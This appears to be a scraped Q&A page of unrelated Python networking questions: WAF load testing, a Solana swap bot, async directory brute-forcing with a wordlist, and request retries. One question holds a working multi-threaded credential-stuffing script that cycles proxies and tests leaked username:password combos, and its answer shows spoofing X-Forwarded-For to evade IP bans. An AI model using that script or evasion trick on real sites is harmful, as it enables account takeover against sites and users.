I am trying to test aws waf using Python 3. The idea is to send an 500 to 1000 HTTP request in N seconds/minutes and print the status code of each request. the time need to be specified by user, like if user wants to send 1000 request in 5 minutes or wants to send all 1000 request in 1 second.
I am not able to implement timing.
How can I make this work? Below is my code so far:
import requests
import time
import threading
countRequests = 0
countSuccessRequests = 0
countFailedRequests = 0
countAllowRequests = 0
countBlockedRequests = 0
coubtErrors = 0
class Requester(threading.Thread):
def __init__(self, url, w):
threading.Thread.__init__(self)
self.url = url
def run(self):
global countRequests
global countSuccessRequests
global countFailedRequests
global countAllowRequests
global countBlockedRequests
global coubtErrors
try:
r = requests.get(url)
countSuccessRequests+=1
if (r.status_code == 200):
countAllowRequests+=1
print(f"countRequest: {countAllowRequests}, statusCode: {r.status_code}")
if (r.status_code == 403):
countBlockedRequests+=1
print(f"Blocked: {countBlockedRequests}, statusCode: {r.status_code}")
if (r.status_code != 200 and r.status_code != 403):
print(f'Failed: code= {r.status_code}, sample: {w}')
except (requests.Timeout, requests.ConnectionError, requests.HTTPError) as err:
countFailedRequests+=1
if __name__ == '__main__':
url = 'URL-HERE'
print(f"url: {url}")
requ = 150
for w in range(1, requ, +1):
req = Requester(url,w)
req.start()
time.sleep(0)
I tried searching on stack overflow however i was not able to build logic for it.
I would appreciate someone to point me to the correct thread or help me build one.
Related
I am having some troubles with my program as when it reaches the end of the third() function, it continues to try to execute transactions. I tried having it return None to break out of the seemly infinite loop that it is in with no success. I am sure that I am missing something very simple here and am guessing it has something to do with the recursion that I used. Thanks for any help that you can provide.
import asyncio
import base64
import json
import os
import os.path
import time
import httpcore
import requests
from typing import Awaitable
import solana
import httpx
from rich import print
from solana.keypair import Keypair
from solana.publickey import PublicKey
from solana.rpc.api import Client
from solana.rpc.async_api import AsyncClient
from solana.rpc.commitment import Confirmed
from solana.rpc.types import TxOpts
from solana.transaction import Transaction
# Notes
# This is meant as a bare bones hello world and as such does not have :
#
# - error handling on http calls
# - checks / retries to ensure solana transactions go through
# - logging - just your basic print statement here. But at least you get the Rich pretty printing variant :)
#
# Libraries used
# - https://www.python-httpx.org/ - cause it's shinier and better than requests
# - https://michaelhly.github.io/solana-py/
# - https://github.com/Textualize/rich for pretty printing - because it rocks.
# I use poetry to manage dependencies but am not including the project file here for brevity.
# Mint constants
USDC_MINT = "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v", 6
SOL_MINT = "So11111111111111111111111111111111111111112", 9
FAB_MINT = "EdAhkbj5nF9sRM7XN7ewuW8C9XEUMs8P7cnoQ57SYE96", 9
FUSD_MINT = "B7mXkkZgn7abwz1A3HnKkb18Y6y18WcbeSkh1DuLMkee", 8
# This works ok - most of the time
rpc_host = "https://api.mainnet-beta.solana.com"
filename = r"C:\Users\myname\.config\solana\burner.json"
def get_wallet_keypair(filename: str) -> Keypair:
"""Load a keypair from a filesystem wallet."""
if not os.path.isfile(filename):
raise Exception(f"Wallet file '{filename}' is not present.")
with open(filename) as json_file:
data = json.load(json_file)
mid = len(data) // 2
secret_key = data[:mid]
secret_bytes = bytes(secret_key)
keypair = Keypair.from_secret_key(secret_bytes)
print(f"Public Key is: {keypair.public_key}")
return keypair
async def get_quote(
input_mint: str, output_mint: str, amount: int, slippage: int = 0.2):
url_query = f"https://quote-api.jup.ag/v1/quote?outputMint={output_mint}&inputMint={input_mint}&amount={amount}&slippage={slippage}"
print(url_query)
async with httpx.AsyncClient() as client:
r = await client.get(url_query)
return r.json()
async def get_transaction(route: dict, user_key: str) -> dict:
swap_url = "https://quote-api.jup.ag/v1/swap"
input = {"route": route, "userPublicKey": user_key, "wrapUnwrapSOL": True}
print(json.dumps(input, indent=2))
async with httpx.AsyncClient() as client:
r = await client.post(swap_url, json=input,
timeout=6.0) # slightly longer timout as the free rpc server can be a bit laggy
return r.json()
def send_transaction(payer: Keypair, cc: Client, swap_transaction: str, opts: TxOpts) -> str:
""" Send a serialized transaction to the RPC node """
trans = Transaction.deserialize(base64.b64decode(swap_transaction))
result = cc.send_transaction(trans, payer, opts=opts)
txid = result["result"]
print(f"transaction details :https://solscan.io/tx/{txid}")
return txid
async def async_main(from_mint, from_decimals, to_mint, quantity):
cc = Client(rpc_host)
print(f" Converting {quantity} {from_mint} to {to_mint} with {from_decimals} Decimals")
quote_quantity = quantity * (10 ** from_decimals)
r = await get_quote(str(from_mint), str(to_mint), quote_quantity, slippage=2)
quote, outAmount = r["data"][0], int(r['data'][0]['outAmountWithSlippage']) / (10 ** from_decimals)
print("Out Amount =", outAmount)
if quote := r["data"][0]:
print(quote)
# get the relevant transaction details
trans = await get_transaction(quote, str(pubkey))
setup_transaction = trans["setupTransaction"] if "setupTransaction" in trans else None
swap_transaction = trans["swapTransaction"] if "swapTransaction" in trans else None
cleanup_transaction = trans["cleanupTransaction"] if "cleanupTransaction" in trans else None
opts = TxOpts(skip_preflight=True)
# Setup transaction. Will create any missing accounts if required.
if setup_transaction:
print("Sending setup transaction")
#print(setup_transaction)
send_transaction(payer, cc, setup_transaction, opts)
# This one actually does the business
if swap_transaction:
print("Sending swap transaction")
txid = send_transaction(payer, cc, swap_transaction, opts)
# Wait for the transaction to complete before looking it up on chain.
# Clearly this is *not* the right way to do this. Retry in a loop or something fancy.
await asyncio.sleep(20)
result = cc.get_transaction(txid, commitment=Confirmed)
print(result)
# Haven't seen one of these needed yet. Hopefully the jup.ag devs can explain when it's required.
if cleanup_transaction:
print("Sending send transaction")
send_transaction(payer, cc, cleanup_transaction, opts)
print("Swap Complete !")
return outAmount
def get_balance(input_mint):
url = "https://api.mainnet-beta.solana.com"
headers = {'Content-type': 'application/json'}
if input_mint == "So11111111111111111111111111111111111111112":
data = {"jsonrpc": "2.0", "id": 1, "method": "getBalance", "params": [f"{pubkey}"]}
response = requests.post(url, data=json.dumps(data), headers=headers)
response = response.text
parsed = json.loads(response)
# print(json.dumps(parsed, indent=4, sort_keys=True))
accountBal = (parsed['result']['value']) / 10 ** SOL_MINT[1]
print(accountBal)
else:
data = {"jsonrpc": "2.0", "id": 1, "method": "getTokenAccountsByOwner",
"params": [f"{pubkey}",
{"mint": f"{input_mint}"}, {"encoding": "jsonParsed"}]}
response = requests.post(url, data=json.dumps(data), headers=headers)
response = response.text
parsed = json.loads(response)
# print(json.dumps(parsed, indent=4, sort_keys=True))
accountBal = parsed['result']['value'][0]['account']['data']['parsed']['info']['tokenAmount']['uiAmount']
print(accountBal)
return accountBal
# usdc buys fusd fusd is sold for sol sol is sold for usdc
# (from_mint, from_decimals, to_mint, quantity):
class swaps:
def __init__(self, input_mint, decimals, output_mint, amount):
self.input_mint = input_mint
self.decimals = decimals
self.output_mint = output_mint
self.amount = amount
def swap(self):
asyncio.run(async_main(self.input_mint, self.decimals, self.output_mint, self.amount))
def first(count, previous = 0):
try:
if get_balance(USDC_MINT[0]) <= 1:
time.sleep(1)
count += 1
if count >= 60:
third(0)
first(count)
except TypeError:
first(0)
step1 = swaps(USDC_MINT[0], USDC_MINT[1], FUSD_MINT[0], get_balance(USDC_MINT[0]) if previous == 0 else previous)
try:
step1.swap()
except httpx.ReadTimeout:
print("Retrying")
time.sleep(10)
first(0)
second(0)
def second(count, previous = 0):
try:
if get_balance(FUSD_MINT[0]) <= 1:
time.sleep(1)
count += 1
if count >= 60:
first(0)
second(count)
except TypeError:
second(0)
step2 = swaps(FUSD_MINT[0], FUSD_MINT[1], SOL_MINT[0], get_balance(FUSD_MINT[0]) if previous == 0 else previous)
try:
step2.swap()
except:
print("Retrying")
time.sleep(10)
second(0)
count = 0
third(0)
def third(count, previous = 0):
if get_balance(SOL_MINT[0]) < .6:
time.sleep(1)
count += 1
if count >= 60:
second(0)
third(count)
step3 = swaps(SOL_MINT[0], SOL_MINT[1], USDC_MINT[0], get_balance(SOL_MINT[0]) - 0.5 if previous == 0 else previous)
try:
step3.swap()
except:
print("Retrying")
time.sleep(10)
third(previous)
print("All Swaps Completed")
return None
payer = get_wallet_keypair(filename)
pubkey = payer.public_key
loops = 0
if __name__ == "__main__":
previousBalence = get_balance(USDC_MINT[0])
print(f"Starting Balence: {previousBalence}")
#for loops in range(5):
first(0)
loops += 1
endBalance = get_balance((USDC_MINT[0]))
print(f"End balence is {endBalance}")
totalProfit = endBalance-previousBalence
print(f"Total Profit is: {totalProfit}")
Edit: The output when the code continues is it keeps trying to swap fUSD for SOL and SOL for USDC over and over again.
Solution: https://pastebin.com/8id7gfe4
Word of notice: This is my first approach with asyncio, so I might have done something really stupid.
Scenario is as follows:
I need to "http-ping" a humongous list of urls to check if they respond 200 or any other value. I get timeouts for each and every request, though tools like gobuster report 200,403, etc.
My code is sth similar to this:
import asyncio,aiohttp
import datetime
#-------------------------------------------------------------------------------------
async def get_data_coroutine(session,url,follow_redirects,timeout_seconds,retries):
#print('#DEBUG '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+url)
try:
async with session.get(url,allow_redirects=False,timeout=timeout_seconds) as response:
status = response.status
#res = await response.text()
if( status==404):
pass
elif(300<=status and status<400):
location = str(response).split("Location': \'")[1].split("\'")[0]
print('#HIT '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+str(status)+' '+url+' ---> '+location)
if(follow_redirects==True):
return await get_data_coroutine(session,location,follow_redirects,timeout_seconds,retries)
else:
print('#HIT '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+str(status)+' '+url)
return None
except asyncio.exceptions.TimeoutError as e:
print('#ERROR '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+' '+' '+url+' TIMEOUT '+str(e))
return None
#---------------------------------------------------------------------------
async def main(loop):
base_url = 'http://192.168.59.37'
extensions = ['','.html','php']
fd = open('/usr/share/wordlists/dirb/common.txt','r')
words_without_suffix = [x.strip() for x in fd.readlines()]#[-5:] #DEBUG!
words_with_suffix = [base_url+'/'+x+y for x in words_without_suffix for y in extensions]
follow = True
total_timeout = aiohttp.ClientTimeout(total=60*60*24)
timeout_seconds = 10
retries = 1
async with aiohttp.ClientSession(loop=loop,timeout=total_timeout) as session:
tasks = [get_data_coroutine(session,url,follow,timeout_seconds,retries) for url in words_with_suffix]
await asyncio.gather(*tasks)
print('DONE')
#---------------------------------------------------------------------------
if(__name__=='__main__'):
loop = asyncio.get_event_loop()
result = loop.run_until_complete(main(loop))
Did I do something really wrong?
Any word of advice?
Thank you SO much!
Actually, I ended up finding an open issue in aio-libs/aiohttp:
https://github.com/aio-libs/aiohttp/issues/3203
This way, they suggest a workaround that achieves my needs:
session_timeout = aiohttp.ClientTimeout(total=None,sock_connect=timeout_seconds,sock_read=timeout_seconds)
async with aiohttp.ClientSession(timeout=session_timeout) as session:
async with session.get(url,allow_redirects=False,timeout=1) as response:
...
To answer your question - no you did nothing wrong. I can't see anything wrong with your code in terms of http request/response/timeout handling.
If indeed all your requests are timing out to the host (http://192.168.59.37) I suspect the issues are you are experiencing are most likely down to how your network is resolving requests (or how your code is building the url).
You can confirm whether requests are independently succeeding/failing using a tool like curl, eg:
curl "http://192.168.59.37/abc.html"
I tested it locally by using
python3 -m http.server 8080
and placing an empty files 'abc' and 'abc.html' in the same directory, updating the base_url
base_url = "http://127.0.0.1:8080"
with my minor updates (code below) here's the output.
http://127.0.0.1:8080/.bashrc.php
#404
http://127.0.0.1:8080/.bashrc
#404
http://127.0.0.1:8080/.bashrc.html
#404
http://127.0.0.1:8080/abc
#HIT 2020-11-03 12:57:33 200 http://127.0.0.1:8080/abc
http://127.0.0.1:8080/zt.php
#404
http://127.0.0.1:8080/zt.html
#404
http://127.0.0.1:8080/zt
#404
http://127.0.0.1:8080/abc.html
#HIT 2020-11-03 12:57:33 200 http://127.0.0.1:8080/abc.html
http://127.0.0.1:8080/abc.php
#404
DONE
My updates are mostly minor but it might help with further debugging.
For debug, print the url. Important to determine if the code was building the url correctly. This highlighted to me that 'php' extension is missing a ".", so it would be looking for abcphp, not abc.php.
Use response.ok to test a successful http response, your code wasn't handling 500 errors (instead it was returning hit).
using python f-string for cleaner formatting
import asyncio
import aiohttp
import datetime
async def get_data_coroutine(session, url, follow_redirects, timeout_seconds, retries):
try:
async with session.get(
url, allow_redirects=False, timeout=timeout_seconds
) as response:
print(url)
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if response.ok:
print(f"#HIT {now} {response.status} {url}")
else:
status = response.status
if status == 404:
print("#404")
elif 300 <= status and status < 400:
location = str(response).split("Location': '")[1].split("'")[0]
print(f"#HIT {now} {status} {url} ---> {location}")
if follow_redirects is True:
return await get_data_coroutine(
session, location, follow_redirects, timeout_seconds, retries
)
else:
print("#ERROR ", response.status)
return None
except asyncio.TimeoutError as e:
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f"#ERROR {now} {url} TIMEOUT ", e)
return None
async def main(loop):
base_url = "http://127.0.0.1:8080"
extensions = ["", ".html", ".php"]
fd = open("/usr/share/wordlists/dirb/common.txt", "r")
words_without_suffix = [x.strip() for x in fd.readlines()]
words_with_suffix = [
base_url + "/" + x + y for x in words_without_suffix for y in extensions
]
follow = True
total_timeout = aiohttp.ClientTimeout(total=60 * 60 * 24)
timeout_seconds = 10
retries = 1
async with aiohttp.ClientSession(loop=loop, timeout=total_timeout) as session:
tasks = [
get_data_coroutine(session, url, follow, timeout_seconds, retries)
for url in words_with_suffix
]
await asyncio.gather(*tasks)
print("DONE")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
result = loop.run_until_complete(main(loop))
I do a loop of requests and unfortunately sometimes there happens a server timeout. Thats why I want to check the status code first and if it is not 200 I want to go back and repeat the last request until the status code is 200. An example of the code looks like this:
for i in range(0, len(table)):
var = table.iloc[i]
url = 'http://example.request.com/var/'
response = requests.get(url)
if response.status_code == 200:
data = response.json()
else:
"go back to response"
I am appending the response data of every i, so I would like to go back as long as the response code is 200 and then go on with the next i in the loop.
Is there any easy solution?
I believe you want to do something like this:
for i in range(0, len(table)):
var = table.iloc[i]
url = 'http://example.request.com/var/'
response = requests.get(url)
while response.status_code != 200:
response = requests.get(url)
data = response.json()
I made a small example, used an infinite loop and used break to demonstrate when the status code is = 200
while True:
url = 'https://stackoverflow.com/'
response = requests.get(url)
if response.status_code == 200:
# found code
print('found exemple')
break
As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
I have Python application which uses threading and requests modules for processing many pages. Basic function for page downloading looks like this:
def get_page(url):
error = None
data = None
max_page_size = 10 * 1024 * 1024
try:
s = requests.Session()
s.max_redirects = 10
s.keep_alive = False
r = s.get('http://%s' % url if not url.startswith('http://') else url,
headers=headers, timeout=10.0, stream=True)
raw_data = io.BytesIO()
size = 0
for chunk in r.iter_content(4096):
size += len(chunk)
raw_data.write(chunk)
if size > max_page_size:
r.close()
raise SpyderError('too_large')
fetch_result = 'ok'
finally:
del s
It works well in most cases but sometimes application freezes because of very slow connection with some servers or some other network problems. How can I setup a global guaranteed timeout for whole function? Should I use asyncio or coroutines?